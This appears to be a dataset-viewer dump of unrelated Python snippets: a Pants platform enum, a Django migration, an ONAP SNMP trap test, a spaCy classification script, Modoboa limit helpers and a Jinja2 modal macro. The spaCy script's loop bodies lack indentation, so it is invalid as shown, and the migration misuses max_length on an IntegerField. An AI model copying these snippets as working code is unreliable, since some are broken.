# p_tags = soup.find_all("p")
# for p_tag in p_tags:
#     print(p_tag.text)
# print(type(soup.head))
# print([p.text.strip() for p in soup.find(id="div-3").find_all("p")])
# print([p.text.strip() for p in soup.find(class_="class-1").find_all("p")])
|
import web_scrape as client
# Python 2 one-off: print the scraped record for a hard-coded Zillow zpid.
print client.get_property_by_zpid(83154148)
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from enum import Enum
from pants.util.osutil import get_normalized_arch_name, get_normalized_os_name
class PlatformError(Exception):
    """Raise when an attempt is made to execute a process on a platform where it cannot succeed.

    E.g., because it requires a tool that is not supported on the platform.
    """
class Platform(Enum):
    """The normalized OS/architecture pairs Pants can execute on."""

    linux_arm64 = "linux_arm64"
    linux_x86_64 = "linux_x86_64"
    macos_arm64 = "macos_arm64"
    macos_x86_64 = "macos_x86_64"

    @property
    def is_macos(self) -> bool:
        """True for either macOS variant."""
        return self in (Platform.macos_arm64, Platform.macos_x86_64)

    @classmethod
    def create_for_localhost(cls) -> Platform:
        """Creates a Platform instance for localhost.

        This method should never be accessed directly by `@rules`: instead, to get the currently
        active `Platform`, they should request a `Platform` as a positional argument.
        """
        localhost_value = f"{get_normalized_os_name()}_{get_normalized_arch_name()}"
        return cls(localhost_value)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2020-01-17 15:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # NOTE(review): ``max_length`` has no effect on IntegerField (Django only
    # honours it on char-based fields), and a 19-digit card number overflows
    # common integer column sizes -- a CharField(max_length=19) is the usual
    # choice.  Confirm before editing an already-applied migration.
    dependencies = [
        ('user', '0003_auto_20200117_1532'),
    ]
    operations = [
        migrations.AlterField(
            model_name='account',
            name='bank_no',
            field=models.IntegerField(max_length=19, verbose_name='银行卡号'),
        ),
    ]
|
import logging
import logging.handlers
import appdirs
import os
log_dir = appdirs.user_log_dir('nab')  # per-user log directory
log_file = os.path.join(log_dir, 'log.txt')


def _init():
    """Create and configure the package-level "nab" logger.

    DEBUG and above goes to a rotating file under the user log directory;
    INFO and above also goes to the console.  Returns the configured logger.
    """
    log = logging.getLogger("nab")
    log.setLevel(logging.DEBUG)
    log.propagate = False  # keep nab messages out of the root logger
    formatter = logging.Formatter('%(asctime)s: %(levelname)s:\t'
                                  '%(name)s:\t%(message)s')
    # create log directory
    # Bug fix: the old ``try: makedirs / except OSError: pass`` also swallowed
    # permission errors; exist_ok only tolerates an already-existing directory.
    os.makedirs(log_dir, exist_ok=True)
    file_handler = logging.handlers.RotatingFileHandler(
        log_file, maxBytes=1024*1024, backupCount=5)
    file_handler.setFormatter(formatter)
    log.addHandler(file_handler)
    stream_handler = logging.StreamHandler()
    stream_handler.setLevel(logging.INFO)
    stream_handler.setFormatter(formatter)
    log.addHandler(stream_handler)
    return log


log = _init()  # module-level singleton logger
|
# ============LICENSE_START=======================================================
# Copyright (c) 2019-2022 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
import datetime
import glob
import io
import json
import os
from pathlib import Path
import sys
import tempfile
import unittest
from unittest.mock import patch
import snmptrapd
import trapd_settings as tds
import trapd_runtime_pid
import trapd_io
class test_trapd_io(unittest.TestCase):
    """
    Tests for the trapd_io module: EELF log file handling, the generic
    open/close/roll file helpers and the ecomp_logger dispatch.
    (The original docstring incorrectly referred to the save_pid mod.)
    """
    class PseudoFile():
        """ test file-like object that does nothing """
        def write(self):
            pass
        def close(self):
            pass
    class WriteThrows():
        """ test file-like object that throws on a write """
        def write(self):
            raise RuntimeError("close() throws")
    @classmethod
    def setUpClass(cls):
        # Build the runtime directory tree once and install a complete
        # in-memory configuration for every test in this class.
        tds.init()
        snmptrap_dir = "/tmp/opt/app/snmptrap"
        try:
            Path(snmptrap_dir + "/logs").mkdir(parents=True, exist_ok=True)
            Path(snmptrap_dir + "/tmp").mkdir(parents=True, exist_ok=True)
            Path(snmptrap_dir + "/etc").mkdir(parents=True, exist_ok=True)
        except Exception as e:
            print("Error while running %s : %s" % (os.path.basename(__file__), str(e.strerror)))
            sys.exit(1)
        # fmt: off
        tds.c_config = json.loads(
            '{ "snmptrapd": { '
            ' "version": "1.4.0", '
            ' "title": "ONAP SNMP Trap Receiver" }, '
            '"protocols": { '
            ' "transport": "udp", '
            ' "ipv4_interface": "0.0.0.0", '
            ' "ipv4_port": 6162, '
            ' "ipv6_interface": "::1", '
            ' "ipv6_port": 6162 }, '
            '"cache": { '
            ' "dns_cache_ttl_seconds": 60 }, '
            '"publisher": { '
            ' "http_timeout_milliseconds": 1500, '
            ' "http_retries": 3, '
            ' "http_milliseconds_between_retries": 750, '
            ' "http_primary_publisher": "true", '
            ' "http_peer_publisher": "unavailable", '
            ' "max_traps_between_publishes": 10, '
            ' "max_milliseconds_between_publishes": 10000 }, '
            '"streams_publishes": { '
            ' "sec_fault_unsecure": { '
            ' "type": "message_router", '
            ' "aaf_password": null, '
            ' "dmaap_info": { '
            ' "location": "mtl5", '
            ' "client_id": null, '
            ' "client_role": null, '
            ' "topic_url": "http://localhost:3904/events/ONAP-COLLECTOR-SNMPTRAP" }, '
            ' "aaf_username": null } }, '
            '"files": { '
            ' "runtime_base_dir": "/tmp/opt/app/snmptrap", '
            ' "log_dir": "logs", '
            ' "data_dir": "data", '
            ' "pid_dir": "tmp", '
            ' "arriving_traps_log": "snmptrapd_arriving_traps.log", '
            ' "snmptrapd_diag": "snmptrapd_prog_diag.log", '
            ' "traps_stats_log": "snmptrapd_stats.csv", '
            ' "perm_status_file": "snmptrapd_status.log", '
            ' "eelf_base_dir": "/tmp/opt/app/snmptrap/logs", '
            ' "eelf_error": "error.log", '
            ' "eelf_debug": "debug.log", '
            ' "eelf_audit": "audit.log", '
            ' "eelf_metrics": "metrics.log", '
            ' "roll_frequency": "day", '
            ' "minimum_severity_to_log": 2 }, '
            '"trap_config": { '
            ' "sw_interval_in_seconds": 60, '
            ' "notify_oids": { '
            ' ".1.3.6.1.4.1.9.0.1": { '
            ' "sw_high_water_in_interval": 102, '
            ' "sw_low_water_in_interval": 7, '
            ' "category": "logonly" }, '
            ' ".1.3.6.1.4.1.9.0.2": { '
            ' "sw_high_water_in_interval": 101, '
            ' "sw_low_water_in_interval": 7, '
            ' "category": "logonly" }, '
            ' ".1.3.6.1.4.1.9.0.3": { '
            ' "sw_high_water_in_interval": 102, '
            ' "sw_low_water_in_interval": 7, '
            ' "category": "logonly" }, '
            ' ".1.3.6.1.4.1.9.0.4": { '
            ' "sw_high_water_in_interval": 10, '
            ' "sw_low_water_in_interval": 3, '
            ' "category": "logonly" } } }, '
            '"snmpv3_config": { '
            ' "usm_users": [ { '
            ' "user": "usr-sha-aes256", '
            ' "engineId": "8000000001020304", '
            ' "usmHMACSHAAuth": "authkey1", '
            ' "usmAesCfb256": "privkey1" }, '
            ' { "user": "user1", '
            ' "engineId": "8000000000000001", '
            ' "usmHMACMD5Auth": "authkey1", '
            ' "usmDESPriv": "privkey1" }, '
            ' { "user": "user2", '
            ' "engineId": "8000000000000002", '
            ' "usmHMACSHAAuth": "authkey2", '
            ' "usmAesCfb128": "privkey2" }, '
            ' { "user": "user3", '
            ' "engineId": "8000000000000003", '
            ' "usmHMACSHAAuth": "authkey3", '
            ' "usmAesCfb256": "privkey3" } '
            '] } }'
        )
        # fmt: on
        tds.json_traps_filename = (
            tds.c_config["files"]["runtime_base_dir"] + "/json_traps.json"
        )
        tds.arriving_traps_filename = (
            tds.c_config["files"]["runtime_base_dir"] + "/arriving_traps.log"
        )
    def test_open_eelf_error_file(self):
        """
        Test bad error file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf error logs
            tds.c_config["files"]["eelf_error"] = "/bad_dir/error.log"
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_debug_file(self):
        """
        Test bad debug file location
        """
        # open eelf debug logs
        with patch.dict(tds.c_config["files"]):
            tds.c_config["files"]["eelf_debug"] = "/bad_dir/debug.log"
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_audit_file(self):
        """
        Test bad audit file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf debug logs
            tds.c_config["files"]["eelf_audit"] = "/bad_dir/audit.log"
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_metrics_file(self):
        """
        Test bad metrics file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf debug logs
            tds.c_config["files"]["eelf_metrics"] = "/bad_dir/metrics.log"
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_error_file_missing_name(self):
        """
        Test bad error file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf error logs
            del tds.c_config["files"]["eelf_error"]
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_debug_file_missing_name(self):
        """
        Test bad debug file location
        """
        # open eelf debug logs
        with patch.dict(tds.c_config["files"]):
            del tds.c_config["files"]["eelf_debug"]
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_audit_file_missing_name(self):
        """
        Test bad audit file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf debug logs
            del tds.c_config["files"]["eelf_audit"]
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_open_eelf_metrics_file_missing_name(self):
        """
        Test bad metrics file location
        """
        with patch.dict(tds.c_config["files"]):
            # open eelf debug logs
            del tds.c_config["files"]["eelf_metrics"]
            # try to open file in non-existent dir
            with self.assertRaises(SystemExit):
                result = trapd_io.open_eelf_logs()
    def test_roll_all_logs_not_open(self):
        """
        Test roll of logs when not open
        """
        # try to roll logs when not open. Shouldn't fail
        trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_all_logs(self):
        """
        Test rolling files that they are open
        """
        trapd_io.open_eelf_logs()
        # try to roll logs
        trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_all_logs_roll_file_throws(self):
        """
        Test rolling files that they are open
        but roll_file throws an exception
        """
        trapd_io.open_eelf_logs()
        # try to roll logs
        with patch('trapd_io.roll_file') as roll_file_throws:
            roll_file_throws.side_effect = RuntimeError("roll_file() throws")
            with self.assertRaises(SystemExit):
                trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_all_logs_open_eelf_logs_returns_false(self):
        """
        Test rolling files that they are open
        but open_eelf_logs returns false
        """
        trapd_io.open_eelf_logs()
        # try to roll logs
        with patch('trapd_io.open_eelf_logs') as open_eelf_logs_throws:
            open_eelf_logs_throws.return_value = False
            with self.assertRaises(SystemExit):
                trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_all_logs_open_file_json_traps_throws(self):
        """
        Test rolling files that they are open
        but open_file(json_traps_filename) throws an exception
        """
        def tmp_func(nm):
            if nm == tds.json_traps_filename:
                raise RuntimeError("json_traps_filename throws")
            return test_trapd_io.PseudoFile()
        trapd_io.open_eelf_logs()
        # try to roll logs
        with patch('trapd_io.open_file') as open_file_throws:
            open_file_throws.side_effect = tmp_func
            with self.assertRaises(SystemExit):
                trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_all_logs_open_file_arriving_traps_throws(self):
        """
        Test rolling files that they are open
        but open_file(arriving_traps_filename) throws an exception
        """
        def tmp_func(nm):
            if nm == tds.arriving_traps_filename:
                raise RuntimeError("arriving_traps_filename throws")
            return test_trapd_io.PseudoFile()
        trapd_io.open_eelf_logs()
        # try to roll logs
        with patch('trapd_io.open_file') as open_file_throws:
            open_file_throws.side_effect = tmp_func
            with self.assertRaises(SystemExit):
                trapd_io.roll_all_logs()
        self.assertIsNotNone(tds.eelf_error_fd)
    def test_roll_file(self):
        """
        Test roll of individual file when not present
        """
        # try to roll a valid log file
        with tempfile.TemporaryDirectory() as ntd:
            fn = ntd + "/test.log"
            with open(fn, "w") as ofp:
                self.assertTrue(trapd_io.roll_file(fn))
                # The file will be renamed to something like
                # test.log.2022-08-17T20:28:32
                self.assertFalse(os.path.exists(fn))
                # We could also add a test to see if there is a file
                # with a name like that.
                files = list(glob.glob(f"{ntd}/*"))
                print(f"files={files}")
                self.assertEqual(len(files), 1)
                self.assertTrue(files[0].startswith(fn + "."))
    def test_roll_file_not_present(self):
        """
        Test roll of individual file when not present
        """
        # try to roll logs when not open
        self.assertFalse(trapd_io.roll_file("/file/not/present"))
    def test_roll_file_no_write_perms(self):
        """
        try to roll logs when not enough perms
        """
        with tempfile.TemporaryDirectory() as no_perms_dir:
            # no_perms_dir = "/tmp/opt/app/snmptrap/no_perms"
            no_perms_file = "test.dat"
            no_perms_fp = no_perms_dir + "/" + no_perms_file
            # required directory tree
            #try:
            #    Path(no_perms_dir).mkdir(parents=True, exist_ok=True)
            #    os.chmod(no_perms_dir, 0o700)
            #except Exception as e:
            #    self.fail("Error while running %s : %s" % (os.path.basename(__file__), str(e.strerror)))
            # create empty file
            open(no_perms_fp, "w").close()
            os.chmod(no_perms_dir, 0o555)
            # try to roll file in dir with no write perms
            self.assertFalse(trapd_io.roll_file(no_perms_fp))
            # the file should still be there
            open(no_perms_fp).close()
            # allow the directory to be removed
            os.chmod(no_perms_dir, 0o700)
    def test_open_file_exists(self):
        """
        Test file open in directory present
        """
        # create copy of snmptrapd.json for pytest
        test_file = "/tmp/snmptrap_pytest"
        # try to roll logs when not open
        result = trapd_io.open_file(test_file)
        self.assertTrue(str(result).startswith("<_io.TextIOWrapper name="))
        self.assertIsInstance(result, io.TextIOWrapper)
    def test_open_file_exists_does_not_exist(self):
        """
        Test file open in directory present
        """
        # create copy of snmptrapd.json for pytest
        test_file = "/tmp/no_such_dir/snmptrap_pytest"
        # try to open file when dir not present
        with self.assertRaises(SystemExit):
            result = trapd_io.open_file(test_file)
    def test_close_file_exists(self):
        """
        Test closing a file that's present
        """
        # create copy of snmptrapd.json for pytest
        test_file_name = "/tmp/snmptrap_pytest"
        test_file = trapd_io.open_file(test_file_name)
        # close active file
        self.assertTrue(trapd_io.close_file(test_file, test_file_name))
    def test_close_file_does_not_exist(self):
        """
        Test closing non-existent file
        """
        # try to roll logs when not open
        self.assertFalse(trapd_io.close_file(None, None))
    def test_ecomp_logger_type_error(self):
        """
        test trapd_io.ecomp_logger
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_ERROR, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
    def test_ecomp_logger_type_error_bad_fd(self):
        """
        test trapd_io.ecomp_logger, but write() throws
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        # the following SHOULD be done with a context patch
        sv_eelf_error_fd = tds.eelf_error_fd
        tds.eelf_error_fd = test_trapd_io.WriteThrows()
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_ERROR, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
        tds.eelf_error_fd = sv_eelf_error_fd
    def test_ecomp_logger_type_unknown_bad_fd(self):
        """
        test trapd_io.ecomp_logger, unknown type, but write() throws
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        # the following SHOULD be done with a context patch
        sv_eelf_error_fd = tds.eelf_error_fd
        tds.eelf_error_fd = test_trapd_io.WriteThrows()
        self.assertFalse(trapd_io.ecomp_logger(-1, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
        tds.eelf_error_fd = sv_eelf_error_fd
    def test_ecomp_logger_type_metrics(self):
        """
        test trapd_io.ecomp_logger to metrics
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_METRICS, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
    def test_ecomp_logger_type_metrics_bad_fd(self):
        """
        test trapd_io.ecomp_logger to metrics, but write() throws
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        # the following SHOULD be done with a context patch
        sv_eelf_metrics_fd = tds.eelf_metrics_fd
        tds.eelf_metrics_fd = test_trapd_io.WriteThrows()
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_METRICS, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
        tds.eelf_metrics_fd = sv_eelf_metrics_fd
    def test_ecomp_logger_type_audit(self):
        """
        test trapd_io.ecomp_logger to audit log
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_AUDIT, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
    def test_ecomp_logger_type_audit_bad_fd(self):
        """
        test trapd_io.ecomp_logger to audit log, but write() throws
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        # the following SHOULD be done with a context patch
        sv_eelf_audit_fd = tds.eelf_audit_fd
        tds.eelf_audit_fd = test_trapd_io.WriteThrows()
        self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_AUDIT, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
        tds.eelf_audit_fd = sv_eelf_audit_fd
    def test_ecomp_logger_type_unknown(self):
        """
        test trapd_io.ecomp_logger
        """
        trapd_io.open_eelf_logs()
        msg = "this is a test"
        self.assertFalse(trapd_io.ecomp_logger(-1, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
if __name__ == "__main__":  # pragma: no cover
    unittest.main()
|
"""-----------------------------------------------------------
SpaCy :
Utterance classification with SpaCy
by comparing extracted tokens from sentences
--------------------------------------------------------------"""
import pandas as pd
import numpy as np
from preprocessing import *
from vectorization_spaCy import *
"""
NLP: class in .csv file
0. Dyads
1. Participant
2. Id
3. EAT
4. StartTime
5. EndTime
6. Duration
7. Utterances
8. Subcategories
9. Categories
"""
""" Step 1: Extract data from file """
dataFile='collaborativeActs.csv'
df = pd.read_csv(dataFile,delimiter="\t",header=None,error_bad_lines=False, encoding="utf8")
#categories, classification of the utterances of the file according to their type
categories = ["Interaction management", "Social relation", "Task management", "Information", "Transactivity", "Tool", "Other"]
ut_by_categ=[[x for x, t in zip (df[7], df[9]) if t == c] for c in categories]
utterances=df[7]
subcategories=df[8]
categories=df[9]
""" Step 2: Preprocessing of data """
utterances_ppng=[normalization(utterance) for utterance in utterances]
tokens=[tokenization(utterance) for utterance in utterances_ppng]
tokens=[ delete_stop_words(token) for token in tokens]
#tokens=[ delete_punctuation(token) for token in tokens]
tokens=[ lemmatization(token) for token in tokens]
""" Step 3: Vectorization of sentences """
#vect=[ vectorization2(token) for token in tokens if not len(token)==0] #### PB à REVOIR : attention à cette étape les [] sont retirés (enlève des sentences)
"""i=0
for token in tokens:
if(len(token)==0):
print(utterances[i])
print(token)
i+=1"""
for k in range(len(utterances)):
print(utterances[k])
print(tokens[k])
if not len(tokens[k])==0:
print(vectorization2(tokens[k]))
print('')
""" Step 4: Classification """
# it might be possible to use cosine similarity with kNN or clustering but it costs lot of memory
|
"""Modoboa limits utilities."""
from . import constants
def get_user_limit_templates():
    """Return the default per-user limit templates as (name, definition) pairs."""
    user_defaults = constants.DEFAULT_USER_LIMITS
    return list(user_defaults.items())
def get_domain_limit_templates():
    """Return the default per-domain limit templates as (name, definition) pairs."""
    domain_defaults = constants.DEFAULT_DOMAIN_LIMITS
    return list(domain_defaults.items())
def move_pool_resource(owner, user):
    """Move resource from one pool to another.

    When an account doesn't need a pool anymore, we move the
    associated resource to the pool of its owner.
    """
    for name, _definition in get_user_limit_templates():
        source_limit = user.userobjectlimit_set.get(name=name)
        if source_limit.max_value < 0:
            # negative means unlimited: nothing to transfer
            continue
        target_limit = owner.userobjectlimit_set.get(name=name)
        target_limit.max_value += source_limit.max_value
        target_limit.save()
|
import json,os
def modal():
    """Return the source of a Jinja2 macro that renders a Bootstrap 3 modal.

    The macro takes an element ``id`` and an optional ``body`` callable whose
    output fills the modal body; it also emits two trigger buttons (one via
    the JS helper below, one via the data-api) and the helper script.
    """
    a='''{% macro modal(id="myModal",body=None) %}
<button type="button" class="btn btn-primary" onclick="showmodal()">
Launch demo modal111
</button>
<button type="button" class="btn btn-primary" data-toggle="modal" data-target="#{{ id }}">
Launch demo modal
</button>
<div class="modal fade" id="{{ id }}" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" >
  <div class="modal-dialog" role="document">
    <div class="modal-content">
      <div class="modal-header">
      </div>
      <div class="modal-body">
        {% if body %}
        {{ body() }}
        {% endif %}
      </div>
      <div class="modal-footer">
      </div>
    </div>
  </div>
</div>
<script>
function showmodal() {
    $('#{{ id }}').modal({"show":true});
}
</script>
{% endmacro %}'''
    return a
print(modal())  # emits the macro source when run as a script
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.